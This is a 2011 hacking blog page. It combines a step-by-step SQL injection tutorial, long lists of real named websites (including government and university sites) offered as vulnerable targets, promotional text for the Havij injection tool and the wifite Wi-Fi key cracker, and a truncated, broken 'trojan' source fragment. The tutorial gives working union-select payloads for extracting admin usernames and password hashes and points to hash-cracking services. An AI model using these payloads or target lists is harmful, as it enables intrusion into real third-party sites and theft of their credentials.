Monday, May 16, 2011

SQL INJECTION - TUTORIAL



Finding vunerability:
First of all we need a vunerable site as you all know

To find a vunerable site open google

Type in a dork like "inurl:index.php?id=" (without quotes)


Now click on any site like http://www.site.com/index.php?id=786

To test the vunerability of the site add a ' at the end of the site

If the site gives an error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1"

we can assume that it is vunerable.
Checking the number of columns:
To check the number of columns we do the following

http://www.site.com/index.php?id=-786 order by 1-- if the page loads normally without any error we proceed below
http://www.site.com/index.php?id=-786 order by 2-- (no error)
similarly check
http://www.site.com/index.php?id=-786 order by 3--
http://www.site.com/index.php?id=-786 order by 4--
http://www.site.com/index.php?id=-786 order by 5--
http://www.site.com/index.php?id=-786 order by 6-- =>error

if we get an error at the 6 like "unknown column" that means there exists only 5 columns.
Finding vunerable columns:
To find the vunerable columns we add union all select 1,2,3,4,5-- after http://www.site.com/index.php?id=-786

NOw the url becomes

http://www.site.com/index.php?id=-786 union all select 1,2,3,4,5--

after hitting enter we if we see some numbers like 2 4 some where on the page.Then the columns 2 and 3 are vunerable and data can be retrieved from colums 2 and 4

Finding Mysql version:
To find the sql version we replace 2 or 4 with @@version.
Now the url looks like

http://www.site.com/index.php?id=-786 union all select 1,@@version,3,4,5--

After hitting enter the sql version appears on the page

Lets assume we got 5.0.90-community-log on page which is sql version.
Getting Table names:
To get table names remove @@version from the url and replace it with table_name.

The url now becomes

http://www.site.com/index.php?id=-786 union all select 1,table_name,3,4,5 from information_schema.tables--

After hitting enter the page shows the tablenames.

Lets us assume we got something like this

comment,log,admin,news,news_comment,members.
To take over the site we data should be retrieved from admin table.
Getting the column names:
To get the column names from the table admin we do the following

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)--
Converting the tablename to ascii:
Convert the tablename to ascii here

http://www.getyourwebsitehere.com/jswb/t...ascii.html

The ascii generated for the table name admin is & #97;&# 100;&# 109;&# 105;&# 110;

Now remove &# and add a , between them

So now it is 97,100,109,105,110

Replace it in the place of ascii of the tablename

Now it is

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--

You can now see something like

username pwd gender email on page
Getting username and password:
To get the username and password we use

http://www.site.com/index.php?id=-786 union all select 1,concat(username,0x3a,pwd),3,4,5 from admin-- and hit enter.

At this point we see username and password on page.

In some websites passwords are MD5 encrypted.Decrypt the passwords at http://www.md5decrypter.co.uk
Sql vulnerable ::Huge List !!
Note I am not held responsible for what you do with the provided stuff!!

herz my 1st thread,...dont be rude Tongue
[gov,edu,org,pk etc etc...incl. ]

Code:
https://www.calico.org/page.php?id='5
http://www.lhsaa.org/sports.php?id='5
http://www.hidglobal.com/technology.php?...derType='1
http://www.loginstitute.ca/moreinfo.php?id='5
http://www.joebar.org/p.php?ID='5
http://www.folkeuniversitetet.no/artikkel.php?id='5
http://www.qsen.org/definition.php?id='5
http://www.philipkrohn.com/images.php?id='5
http://www.acisweb.com/prizes.php?id='5
http://nevada211.org/sup.php?id='5
http://www.riskcenter.com/story.php?id='8344
http://www.worstpreviews.com/trailer.php...mp;item='7
http://en.apa.az/news.php?id='118420
http://www.harptabs.com/song.php?ID='85
http://www.pixheaven.net/galerie_us.php?id='3
http://www.worstpreviews.com/headline.php?id='13782
http://www.noborder.org/item.php?id='459
http://www.lcoastpress.com/journal.php?id='6
http://www.indexcopernicus.com/info.php?id='6
http://www.rupri.org/dataresearchviewer.php?id='6
http://www.lcoastpress.com/journal.php?id='7
http://www.spatialinformationdesignlab.o...php?id='16
http://www.democracyjournal.org/article.php?ID='6528
http://www.recexpo.com/exhibition_overview.php?id='157
http://www.unisdr.org/news/v.php?id='12470
http://www.voshy.com/games/play.php?id='Mass_Attack
http://www.pixheaven.net/galerie_us.php?id='22
http://www.onlymelbourne.com.au/melbourn...p?id='3811
http://www.imagesfestival.com/generic.ph...ubmissions
http://mp3hungama.com/music/genre_albums.php?id='8
http://www.lcoastpress.com/journal.php?id='4
http://www.recexpo.com/exhibition_overview.php?id='170
http://www.onlymelbourne.com.au/melbourn...hp?id='681
http://www.lcoastpress.com/book.php?id='214
http://www.zooped.com/view_blog.php?id='001992
http://www.no-smoke.org/htmlpage.php?id='56
http://www.concertandco.com/critique-concert.php?id='2993&s='christophe&p='2
http://www.crashensemble.com/concert_detail.php?ID='104
http://www.sinatrafamily.com/news/news.php?id='0
http://www.austadiums.com/stadiums/stadiums.php?id='9
http://www.edgartownboardoftrade.com/php/events2.php?id='5
http://www.worstpreviews.com/headline.php?id='18192
http://www.royalolympic.com/athens_hotel.php?ID='athens_center_hotel
http://www.frcphotos.com/gallery.php?id='194
http://www.renophil.com/performances/familypops/concert.php?id='5
https://www.kansasstatefair.com/pagedescription.php?pages='sf&id='4
http://www.evergreenrecreation.com/facilities.php?id='10
http://www.ibdb.com/production.php?id='13503
http://www.theratpack.com/news/news.php?id='0
http://mp3hungama.com/music/genre_albums.php?id='21
http://www.ziggymarley.com/comments.php?id='219
http://www.artistfacts.com/detail.php?id='100
http://www.facebook.com/posted.php?id='99984862969&share_id='286456534715&comments='1
http://www.classicalsource.com/db_control/db_prom_review.php?id='8434
http://www.jmusicamerica.com/us/article.php?id='2313
http://www.collectorsworldinc.com/lookup.php?id='72
http://musicfestvancouver.com/home/concertInfo.php?id='319
http://www.atavistic.com/albums.php?id='468
http://www.postpiano.com/products/prod_iteminfo.php?id='168&subCat='iPIANOS
http://www.uploadcity.com/?q='download+free+michael+jackson+concert+1996+in+tunisia
http://www.gingarts.com/photos.php?id='40
http://www.filetransit.com/files.php?name='Concert_Reservation_System_Php
http://industry.rachelbartonpine.com/rec_liner.php?id='14
http://www.almarecords.com/artist.php?id='9
http://www.eurokdj.com/search/disk.php?ID='4180
http://www.planetbollywood.com/displayReview.php?id='041507042947
http://www.robotech.com/news/viewarticle.php?id='305
http://www.inorecords.com/v2/artistsdetail.php?id='40
http://www.newmancenterpresents.com/detail.php?id='10
http://www.fairfaxtimes.com/cms/story.php?id='1505
http://www.organfocus.com/search.php3?keywords='Zwolle
http://www.newtonchannel.com/directory/view.php?id='29
http://www.classicalsource.com/db_control/db_concert_review.php?id='799
http://www.facebook.com/apps/application.php?id='41887435811
http://www.ibdb.com/venue.php?id='1145
http://www.kansasstatefair.com/pagedescription.php?pages='sf&id='394
http://www.musicfestvancouver.com/home/concertInfo.php?id='313
http://www.planetbollywood.com/displayArticle.php?id='062207034443
http://www.belleayremusic.com/concerts/concert.php?id='85
http://www.yccd.edu/news/viewfile.php?id='250
http://www.nmcnet.edu/content.php?id='3
http://www.bethelks.edu/directory/view.php?id='29
http://www.edison.edu/news/detail.php?id='119
http://www.ric.edu/mtd/faculty_Details.php?id='9108
http://research.brown.edu/research/profile.php?id='10320
http://www.salk.edu/insidesalk/article.php?id='71
http://www.vwc.edu/directory/index.php?id='0000168
http://cirrie.buffalo.edu/encyclopedia/article.php?id='116&language='en
http://physiology.case.edu/faculty.php?id='114
http://www.peabody.jhu.edu/content_mail_view.php?id='573
http://library.tc.columbia.edu/news.php?id='375
http://www.mbc.edu/news/r_detail.php?id='1827
http://www.cim.edu/about/release.php?id='609
http://herbergerinstitute.asu.edu/directory/selectone.php?ID='104
http://hr.uoregon.edu/jobs/classified.php?id='3464
http://icampus.yccd.edu/documents/viewdocument.php?id='2815
http://www.hlg.edu/newsinfo/news-story.php?id='734
http://wdfw.wa.gov/publications/pub.php?id='00023

some more and more....


Code:
http://www.blissfieldmichigan.gov/index.php?option='com_content&task='view&id='30&Itemid='44
http://www.arts.gov/grants/recent/09grants/09cham.php?disc='challenge%20america
http://governor.vermont.gov/tools/index.php?topic='GovPressReleases&id='2665&v='Article
http://webdev5.hawaii.gov/spo2/source/search_results.php?sourcemethodID='5
http://www.ri.gov/press/view.php?id='316
http://www.fws.gov/digitalmedia/cdm4/toc.php?CISOROOT='/natdiglib&db='natdiglib&nicks='descri&title='Description
http://www.boip.int/fr/jurisprudence_display.php?&id='219
http://www.comm.ecowas.int/sec/index.php?id='asp010785&lang='fr
http://glogger.mobi/search.php?s='threestates&offset='0&mode='g&type='&uid='
http://www.staatsoper-hamburg.mobi/_biografien/bio_neu.php?id='4758
http://www.comingsoon.net/films.php?id='44399
http://www.peshtigotimes.net/index.php?id='14912
http://www.berca.net/revista/preview.php?id='165
http://www.belleayremusic.org/concerts/concert.php?id='106
http://www.worldmusicinstitute.org/sections.php?id='18
http://www.franksinatratm.org/news/news.php?id='0
http://www.vso.org/eventcatview.php?id='2
http://www.massmoca.org/event_details.php?id='573
http://www.anguillajazz.org/artists.php?id='19
http://www.perkinsmuseum.org/museum/section.php?id='192
http://www.bsomusicians.org/html/content.php?id='37
http://www.visitnacogdoches.org/news.php?id='173
http://mto.societymusictheory.org/mto-events.php?id='75
http://www.agendalyon.org/orga.php?id='132
http://www.austinsymphonicband.org/Schedule/details.php?id='69
http://www.kkfi.org/event.php?id='870
http://www.visitogunquit.org/event.php?id='7
http://www.furtherfield.org/display_tag.php?ID='90
http://www.open-ils.org/dokuwiki/doku.php?id='faqs:evergreen_feature_request_procedures
http://www.psmuseum.org/exhibitions/upcoming_exhibition.php?id='30
http://www.pecjazz.org/index.php?id='4
http://www.heymancenter.org/events.php?id='179
http://www.trytone.org/agenda_festivals.php?id='1
http://www.kuow.org/program.php?id='8685
http://upac.org/event_info.php?id='327&venue='upac
http://www.worldmusicinstitute.org/event.php?id='1041
http://www.newsguild.org/index.php?ID='GRextra
http://www.albionrecords.org/artistdetail.php?ID='2
http://www.ethicaltraveler.org/news_story.php?id='1175
http://www.libraryofmu.org/display-resource.php?id='562
http://www.humanitiesweb.org/human.php?ID='98&a='q&p='c&s='c
http://www.arabpressnetwork.org/rubriquesv2.php?id='183
http://www.etown.org/attend.summary.php?id='317
http://www.cloreleadership.org/page.php?id='73
http://www.kkfi.org/program.php?id='63
http://www.louisvuittontrophy.com/gallery/show.php?id='2462
http://www.theracersgroup.com/news/show.php?id='372
http://www.josleys.com/article_show.php?id='83
http://amatoc.com/content/show.php?id='5
http://www.falltvpreview.com/show.php?id='1063
http://www.compudrug.com/show.php?id='8
http://www.ibdb.com/show.asp?ID='1565
http://chromaticgames.com/show.php?id='9
http://www.powerhousemuseum.com/collection/database/?irn='29949
http://www.supervitaminhair.com/show.php?id='104
http://www.ezytrip.com/webboard/show.php?id='338
http://www.facebook.com/apps/application.php?id='19367456835
http://apps.facebook.com/tvshowchat/show.php?id='1+and+1='2+union+select+@@version--+1
http://www.cvenues.com/festival/show.php?id='2660
http://www.ibdb.com/show.php?ID='2087
http://www.gongwt.com/show.php?ID='99220
http://foshanwenyi.com/htm/cool/show.php?id='33
http://www.manufacturedhomesource.com/requestinfo/index.php?businessID='4454
http://www.profilethai.com/wallpaper/show.php?id='2963
http://album.nnhit.com/detail.php?id='201
http://www.dynamicdrive.com/forums/showthread.php?t='30458
http://www.eatsun.com/cpdq/show.php?id='6009
http://image.ohozaa.com/show.php?id='03aa5a78c1e496249ad80fdc8b261ebe
http://www.stadt-trebbin.com/show.php?id='71
http://www.operationsports.com/game.php?id='665
http://codingforums.com/showthread.php?p='1004218
http://www.recexpo.com/exhibition_overview.php?id='144
http://www.dudesnude.com/show.php?id='601857&profile_view='1&window_depth='&PHPSESSID='6a990
http://www.peabody.uga.edu/news/event.php?id='66
http://www.cs.wcupa.edu/~rkline/csw315/image-upload.html?print='1
http://www.chem.fsu.edu/bio.php?id='39
http://www.engineering.arizona.edu/news/story.php?id='114
http://research.brown.edu/research/profile.php?id='1143144017
http://cirrie.buffalo.edu/encyclopedia/article.php?id='149&language='en
http://www.choices.edu/resources/detail.php?id='15
http://pubs.is.umbc.edu/show.php?record='630&exportType='file&submit='Export&exportFormat='RIS
http://maroo.cs.umass.edu/pub/web/getpdf.php?id='898
http://ciir-publications.cs.umass.edu/getpdf.php?id='684
http://oncampus.osu.edu/article.php?id='1113
http://pubs.its.ucdavis.edu/publication_detail.php?id='45
http://ppc.uiowa.edu/pages.php?id='31
http://www.design.cmu.edu/show_news.php?id='275
http://web.nvd.nist.gov/view/vuln/detail?vulnId='CVE-2010-2904
http://www.baylor.edu/copyright/index.php?id='63562
http://wdfw.wa.gov/publications/pub.php?id='00793
http://www.wrh.noaa.gov/forecasts/display_special_product_versions.php?sid='BOI&pil='AFD&version='10
http://www.senate.michigan.gov/dem/blog.php?id='37
http://www.senate.mi.gov/dem/blog.php?name='Senator%20Glenn%20S%20Anderson
http://www.seafmd-rcu.oie.int/showdoc.php?docid='94&type='Report
http://wdfw.wa.gov/ais/search.php?id='5
http://www.comm.ecowas.int/sec/index.php?id='ap051176fund&lang='en
http://spore.cta.int/index.php?id='229&id_publication='&option='com_content&task='view
http://www.eumetsat.int/Home/Main/DataAccess/EUMETCast/ReceptionStationSet-up/SP_201003171032773?l='en
http://pec.ha.osd.mil/pdts/pdts_faqs.php?submenuheader='3
http://mobiforge.mobi/developing/story/content-delivery-mobile-devices?dm_switcher='true
http://eyeworld.mobi/current-issue-article.php?id='5601
http://www.weathertrends.mobi/calendar.php?id='1880
http://www.cadtutor.mobi/links/includes/jump.php?id='8
http://glogger.mobi/search.php?s='threestates&offset='0&mode='g&type='&uid='
http://betavine.mobi/bvportal/forums/index.html?threadId='ff8080812357258401237b988c9d4145&postPage='5
http://www.mortemzine.net/show.php?id='744
http://www.mortemzine.net/article.php?id='1290
http://www.automotriz.net/galeria2006/show.php?id='5
http://www.gerdoo.net/show.php?id='4333
http://www.zone38.net/phs/archives/show.php?id='83
http://www.dxkeji.net/show.php?id='646
http://dadao.net/htm/cool/show.php?id='33
http://www.cuedb.net/show.php?id='1506&f='02-armin_van_buuren_-_live_at_armin_only_imagine_jaarbeurs_utrecht-cable-04-19-2008-talion&sid='4b67b329502f8437cacb7a934d41d185
http://www.comingsoon.net/news/movienews.php?id='47129
http://www.schlup.net/usb/devices/showdev.php?id='4243
http://dv.eeyes.net/show.php?id='1001
http://www.php-compiler.net/doku.php?id='core%3Aphalanger_for_.net_developers
http://stmmail.net/news/show.php?id='73
http://aviation-safety.net/wikibase/wiki.php?id='70066
http://aviation-safety.net/database/record.php?id='19730603-0
http://www.railpictures.net/photohistory.php?id='290095&showallref='1
http://www.paperrocks.net/page.php?id='187
http://millennium-thisiswhoweare.net/cmeacg/millennium_episode_music.php?id='40&mlm_code='220
http://pmoi.net/article/show.php?id='3498
http://www.framecrafters.net/show-project.php?id='9
http://www.cyberfetch.net/idevaffiliate/idevaffiliate.php?id='894_6
http://www.timesnews.net/article.php?id='9017469
http://www.aklaam.net/aqlam/show.php?id='1360
http://www.gregelliott.net/scripts/displayFeature.php?id='23
http://www.speedguide.net/read_articles.php?id='2574
http://www.torry.net/pages.php?id='245
http://www.schlup.net/usb/devices/showdevcat.php?id='16
http://veteransnetwork.net/veterans_network_channel.php?id='0144904a2c82945&suid='
http://www.patriciapiccinini.net/essay.php?id='27
http://www.comingsoon.net/news/tvnews.php?id='65077
http://www.wildflower.org/expert/show.php?id='612
http://www.mindat.org/show.php?id='2550&ld='1
http://www.medcup.org/venues/show.php?id='3
http://www.etown.org/attend.summary.php?id='317
https://www-den.sans.org/newsletters/risk/display.php?v='7&i='14
http://www.kuow.org/program.php?id='20719
http://www.actionscript.org/forums/showthread.php3?t='231470
http://www.glpi-project.org/wiki/doku.php?id='en:manual:admin:centralhelp_en_gb
http://www.soaw.org/new/article.php?id='1223

and some more..\


Code:
http://www.massmoca.org/event_details.php?id='369
http://www.kkfi.org/program.php?id='76
http://www.capsweb.org/content.php?id='668&menu_id='14
http://www.visitogunquit.org/event.php?id='5
http://www.homeenergy.org/article_full.php?id='699
http://www.ticktick.org/shows/detail.php?id='47
http://www.freesound.org/samplesViewSingle.php?id='21432
http://www.sans.org/newsletters/risk/display.php?v='7&i='4
http://www.filetransit.com/freeware.php?name='Onlinelive_Tv_Php_Id
http://www.filetransit.com/files.php?name='Allmysongs_Shopping_Php_Id_Site_Com_And_A_A
http://www.facebook.com/apps/application.php?id='133934337558
http://useventing.com/aboutus.php?id='11
http://www.hidglobal.com/technology.php?tech_cat='19&subcat_id='10&headerType='1
http://www.volunteeringireland.com/page.php?id='25
http://www.clcbio.com/index.php?id='11
http://www.shropshireyouth.com/index.php?id='7
http://chasetechconsultants.com/job_details.php?id='147
http://www.movie-list.com/trailers.php?id='startrekfirstcontact
http://www.edgartownboardoftrade.com/php/events2.php?id='5
http://wiki.meebo.com/doku.php?id='featureandbuglist
http://www.mediacontacts.com/meet-the-team.php?id='bjorn-brouwer
http://www.velotaxi.com/php/main.php?id='8002&lang='en
http://www.forteinc.com/release/notes.php?id='42
http://www.amedeo.com/lit.php?id='10558929
http://www.esato.com/news/article.php/id='1854
http://www.libyaonline.com/news/details.php?id='12097
http://www.rtrservices.com/equipment.php?id='34
http://www.southworth.com/page.php?id='137
http://www.1stdibs.com/furniture_item_detail.php?id='423316
http://wehatemacs.com/en/index.php?id='3&sub='25
http://wiki.userplane.com/docs/doku.php?id='webchat
http://www.robotech.com/news/viewarticle.php?id='383
http://www.sinauer.com/detail.php?id='2863
http://www.gerontologyparis2009.com/site/view8b.php?id='122
http://www.austadiums.com/stadiums/stadiums.php?id='1
http://www.webdeveloper.com/forum/showthread.php?t='236108
http://www.freezerbox.com/archive/article.php?id='254
http://www.hypnobabies.com/mylink.php?id='3816
http://www.wiserep.com/productDetails.php?id='5769
http://www.birdflubook.com/a.php?id='75
http://www.lcoastpress.com/journal.php?id='3
http://www.acoders.com/acsite/viewsoftware.php?id='66
http://www.goldhawk.com/static.php?id='Contact_Us
http://www.ifpqatar.com/exhibition_overview.php?id='150
http://www.voipshield.com/research-details.php?id='133
http://www.salk.edu/events/index.php?id='150/
http://www.middleware.vt.edu/doku.php?id='middleware:ed:dat:userguide
http://www.ece.umd.edu/news/news_story.php?id='3492
http://www.iupui.edu/goto.php?id='770
http://www.nmcnet.edu/content.php?id='3
http://www.design.cmu.edu/show_job.php?id='795
http://www.rlc.edu/pressroom/printstory.php?id='2604
http://cirrie.buffalo.edu/encyclopedia/article.php?id='17&language='en
http://opdb.risd.edu/view.php?id='34
http://experts.uark.edu/details.php?id='661
http://www.peabody.uga.edu/news/event.php?id='59
http://www.chem.fsu.edu/bio.php?id='39
http://www.lib.jmu.edu/resources/connect.aspx?id='2575
http://wdfw.wa.gov/publications/pub.php?id='00884
http://www.cnrfc.noaa.gov/graphicalRVF.php?id='TRRN2
http://senate.michigan.gov/dem/blog.php?id='14
http://www.comm.ecowas.int/sec/index.php?id='ap020582&lang='en
http://spore.cta.int/index.php?id='1&id_publication='&lang='en&option='com_content&task='view
http://pec.ha.osd.mil/pdts/pdts_faqs.php?submenuheader='3
http://www.health.mil/About_MHS/FAQs.aspx?printable='true
http://igloo.mobi/Games,dir-4.php?&order='popular
http://www.cadtutor.mobi/corner/article.php?id='315
http://netic.mobi/modules/formulaires/formulaire.php?id='2&langue='en
http://eyeworld.mobi/current-issue-article.php?id='5601
http://yaam.mobi/dev/app.php?id='rissolo
http://www.rtvn.mobi/wadditional_display_max.php?page_id='6741
http://www.edimestre.mobi/modules/emplois/emploi.php?id='1&langue='en&menu='5&sousmenu='28&menu='5
http://wqed.mobi/support/member_card_listing.php?id='24
http://aviation-safety.net/database/record.php?id='20090914-0
http://www.midmich.net/news/read.php?id='1157947239
http://www.dal.net/news/shownews.php?id='41
http://www.mtours.net/index.php?id='24&L='1
http://www.timesnews.net/article.php?id='9015331
http://www.cyberthing.net/video-play.php?id='105
http://www.comingsoon.net/news/movienews.php?id='70131
http://www.skywatchertelescope.net/swtinc/product.php?id='141&class1='1&class2='100
http://www.entlearn.net/sisalto.php?id='2
http://www.rpgcodex.net/content.php?id='160
http://www.igps.net/about/press.php?id='57
http://www.cuttingedgehomes.net/links.php?id='19
http://www.cardatabase.net/modifiedairlinerphotos/search/photo_search.php?id='00005390
http://www.muslimyouth.net/advert.php?id='51
http://www.paperrocks.net/page.php?id='128
http://www.reelport.net/index.php?id='522&L='en
http://www.cfijerusalem.net/index.php?id='6.0
http://www.timesnews.net/blogger.php?id='5&postid='7647
http://www.mentalhelp.net/selfhelp/selfhelp.php?id='859
http://journal.shouxi.net/qikan/article.php?id='201644
http://63.e5bed1.client.atlantech.net/races/summary.php?cycle='2008&id='KSS1
http://timblair.net/weblog.php?id='P82
http://cfscc.siraza.net/mazi-articles.php?id='328
http://www.pixheaven.net/galerie_us.php?id='12
http://neuroscientific.net/index.php?id='download
http://www.dddb.net/php/latestnews_Linked.php?id='2712
http://www.nickeychicago.net/vehicle.php?id='132
http://uwsn.serverbox.net/sup.php?id='123&aid='34
http://www.power-tab.net/getarticle.php?id='19
http://www.torry.net/pages.php?id='222
http://www.game-over.net/reviews.php?id='818
http://www.swgalaxies.net/database/index.php?id='89
http://mtncbl.net/index.php?id='36,7,0,0,1,0
http://millennium-thisiswhoweare.net/cmeacg/millennium_episode_music.php?id='40&mlm_code='220
http://sinatrafamily.net/news/news.php?id='0
http://www.gazette.net/gazettecms/story.php?id='1058
http://www.comingsoon.net/news/interviewsnews.php?id='38421
http://63.e5bed1.client.atlantech.net/orgs/summary.php?id='D000000085
http://www.capsweb.org/content.php?id='57&menu_id='8
http://codewizard.org/redirect_tut.php?id='380
http://sans-security.org/newsletters/risk/display.php?v='9&i='10
http://www.sans.org/newsletters/risk/display.php?v='7&i='17
http://www.phoenixfilmfestival.org/pages/contact.php?id='78
http://www.adamsmuseumandhouse.org/product_detail.php?id='22

\and finally some more Tongue

Code:
http://www.bridgingthegap.org/egap.php?id='104
http://www.grinvi.org/members.php?id='23
http://www.atsjats.org/article.php?id='5
http://www.alhaq.org/etemplate.php?id='58
http://www.aarda.org/infocus_article.php?ID='4
http://www.soaw.org/article.php?id='412
http://www.erowid.org/experiences/exp.php?ID='1859
http://us.fulbrightonline.org/program_country.php?id='27
http://timber.unece.org/index.php?id='270
http://wiki.grml.org/doku.php?id='tips
http://www.opensecrets.org/pres08/summary.php?id='n00009638
http://www.nvfc.org/index.php?id='872
http://www.hispanicheritage.org/press_news.php?id='188
http://www.inf-fni.org/pages.php?id='11
http://centersite.org/selfhelp/selfhelp.php?id='859
http://paperrocks.org/page.php?id='137
http://www.kuow.org/program.php?id='17967
http://www.ccof.org/faq_detail.php?id='38
http://kidneynetwork.org/article.php?id='20090909150812
http://www.nicee.org/AboutNICEE.php?id='8
http://www.reachouttrust.org/articleView.php?id='352
http://www.paris2009.org/site/view8b.php?id='122
http://www.freesound.org/usersViewSingle.php?id='29541
http://www.flash.org/download.php?id='47
http://aaep.org/press_room.php?term='2008&id='312
http://www.hubbardbrook.org/data/dataset.php?id='81
http://www.cfkeep.org/html/snapshot.php?id='45306087
http://www.fastuk.org/research/projview.php?id='1449
http://www.homeenergy.org/article_full.php?id='699
http://www.bmdw.org/index.php?id='for_patients
http://www.christianweek.org/stories.php?id='1022
http://www.birdflubook.org/a.php?id='75
http://newfarm.rodaleinstitute.org/ocdbt/displayCert.php?id='62
http://www.open-ils.org/dokuwiki/doku.php?id='evergreen-user:opac_help
http://www.katoombagroup.org/event_details.php?id='32
http://fractured-sanity.org/index.php?navi='resources&site='brushes
http://www.soi-nwg.org/doku.php?id='sra:descriptionhttp://www.lahdenmuseot.fi/main.php?id='316
http://www.lahdenmuseot.fi/main.php?id='241
http://www.lahdenmuseot.fi/main.php?id='471
http://www.velotaxi.de/php/main.php?id='1&lang='en
http://www.velotaxi.de/php/main.php?id='2&lang='en
http://www.velotaxi.de/php/main.php?id='3&lang='en
http://phonesexthebook.com/main.php?id='3
http://www.ittconference.ie/main.php?ID='2
http://www.enpi-info.eu/main.php?id='402&id_type='2
http://www.enpi-info.eu/main.php?id='344&id_type='2
http://www.enpi-info.eu/main.php?id='358&id_type='2
http://www.worstpreviews.com/review.php?id='115
http://www.worstpreviews.com/review.php?id='1052
http://www.worstpreviews.com/review.php?id='141
http://www.pixelsurgeon.com/reviews/review.php?id='687
http://www.pixelsurgeon.com/reviews/review.php?id='644
http://www.pixelsurgeon.com/reviews/review.php?id='626
http://www.avmaniacs.com/review.php?id='1472
http://www.eyemagazine.com/review.php?id='159&rid='788&set='850
http://www.eyemagazine.com/review.php?id='166&rid='850
http://www.eyemagazine.com/review.php?id='151&rid='720&set='78
http://www.nowt2do.co.uk/review.php?id='595
http://www.dvdfanatic.com/review.php?id='hellodolly
http://www.renegaderecon.com/review.php?id='12
http://www.theboxset.com/review.php?id='92
http://www.theboxset.com/review.php?id='211
http://www.dvdholocaust.com/review.php?id='473
http://www.bgra.net/2004/review.php?id='405&type='head
http://www.bgra.net/2004/review.php?id='309&type='combo
http://www.dvdmaniacs.net/review.php?id='493
http://www.onscreenchemistry.com/review.php?id='62
http://techloopreviews.com/review.php?id='89
http://www.dinebaltimore.com/review.php?id='104
http://www.shapewearlingerie.co.uk/shop_category.php?id='2
http://www.macnn.com/reviews/review.php?id='190
http://www.macnn.com/reviews/review.php?id='282
http://avmaniacs.com/review.php?id='1434
http://www.fightersreview.com/mma-review.php?id='66
http://n-europe.com/review.php?rid='515
http://www.victoryzine.com/review.php?id='357
http://www.worststore.com/previews/review.php?id='&section='review
http://www.allaboutjazz.com/php/review.php?id='11505
http://review-php-script.qarchive.org/
http://www.y2neil.com/reviews/review.php?id='41
http://www.playgamehit.com/review.php?id='60
http://www.paperbackreader.com/review.php?ReviewID='2113
http://www.allaboutjazz.com/php/review.php?id='11317
http://www.solotripping.com/review.php?id='34
http://www.kraak.net/en/releases.php?ID='31
http://www.kraak.net/en/releases.php?ID='33
http://www.kraak.net/en/releases.php?ID='34
http://www.naturetrust.bc.ca/releases.php?id='5
http://www.naturetrust.bc.ca/releases.php?id='56
http://www.inrecs.com/releases.php?id='37
http://www.inrecs.com/releases.php?id='38
http://www.thefutureisfierce.com/releases.php?ID='25
http://www.thefutureisfierce.com/releases.php?ID='22
http://www.thefutureisfierce.com/releases.php?ID='30
http://www.brocku.ca/ciswrestling/releases.php?id='54
http://www.njwrecords.com/releases.php?id='22
http://www.njwrecords.com/releases.php?id='17
http://www.dancedp.com/sections/releases.php?id='14
http://spokesrecords.com/releases.php?id='12
http://www.inrecs.com/releases.php?id='1
http://www.mgccc.edu/programs_of_study/technical_programs/curriculum.php?id='31
http://www.mgccc.edu/programs_of_study/health_related_programs/curriculum.php?id='39
http://www.mgccc.edu/programs_of_study/technical_programs/curriculum.php?id='12
http://www.salon52.ca/academies/curriculum.php?id='174
http://www.eanm.org/education/edu_facility/pet_tech/curriculum.php?navId='23
http://www.folklorecv.com/curriculum.php?id='70
http://www.folklorecv.com/curriculum.php?id='99
http://www.folklorecv.com/curriculum.php?id='69
http://fingersonweb.com/curriculum.php?id='168
http://unlocksidekickmobilephone.com/newscat.php%5C%5C%5C%5C%5C%5C%5C'
http://unlocksidekickmobilephone.com/newscat.php%5C%5C%5C'
http://www.guernicaeditions.com/title.php?id='9781550712209
http://www.guernicaeditions.com/title.php?id='9781550713213
http://www.guernicaeditions.com/title.php?id='9781550713077
http://www.carnegiegreenaway.org.uk/livingarchive/title.php?id='29
http://www.carnegiegreenaway.org.uk/livingarchive/title.php?id='114
http://www.carnegiegreenaway.org.uk/livingarchive/title.php?id='18
http://www.seaofstories.com/title.php?id=''4781
http://www.golfgreenfees.com/courses/courses/clubpage.php?id='3288&county='nairnshire&gfs='0
http://www.golfgreenfees.com/2-for-1golf/clubpage.php?id='984
http://www.2for1golfcourses.com/courses/clubpage.php?id='973
http://www.seanscottphotography.com.au/shop_category.php?id='1
http://www.seanscottphotography.com.au/shop_category.php?id='10
http://www.sawasdeekorea.com/shop_category.php?pc_id='4&t='1&p='4&ps_id='



1.61.channel.facebook.com site-scripting (XSS)

1.61.channel.facebook.com site-scripting (XSS) Security researcher Edgard Chammas, has submitted on 02/04/2011 a cross-site-scripting (XSS) vulnerability affecting 1.61.channel.facebook.com, which at the time of submission ranked 2 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/04/2011. It is currently unfixed.

http://1.61.channel.facebook.com/iframe/...Cscript%3E

Havij – Advanced Automated SQL Injection Tool

Bug 
[u]Havij – Advanced Automated SQL Injection Tool

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injection vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
[/u]

http://itsecteam.com/en/projects/project1.htm

wifite – Mass Wifi WEP/WPA Key Cracking Tool



wifite – Mass Wifi WEP/WPA Key Cracking Tool

wifite is created to to attack multiple WEP and WPA encrypted networks at the same time. This tool is customizable to be automated with only a few arguments and can be trusted to run without supervision.

Features

sorts targets by power (in dB); cracks closest access points first
all WPA handshakes are backed up (to wifite.py’s working directory)
mid-attack options: stop during attack with Ctrl+C to use (continue, move onto next target, skip to cracking, exit)
numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
very customizable settings (timeouts, packets/sec, etc)
SKA support (untested)
finds devices in monitor mode; if none are found, prompts for selection
all passwords saved to log.txt
switching WEP attacks does not reset IVS
displays session summary at exit; shows any cracked keys

MY TROJAN -FOR KNOWLEDEGE PURPOSE ONLY

MY TROJAN
//THIS IS ABNORMAL TROJAN HORSE SOURCE CODE ONLY FOR EDUCATION //PURPOSE ONLY

#include
#include
#include
#include
FILE *a,*t,*b;
int r,status,vir_count;
double i;
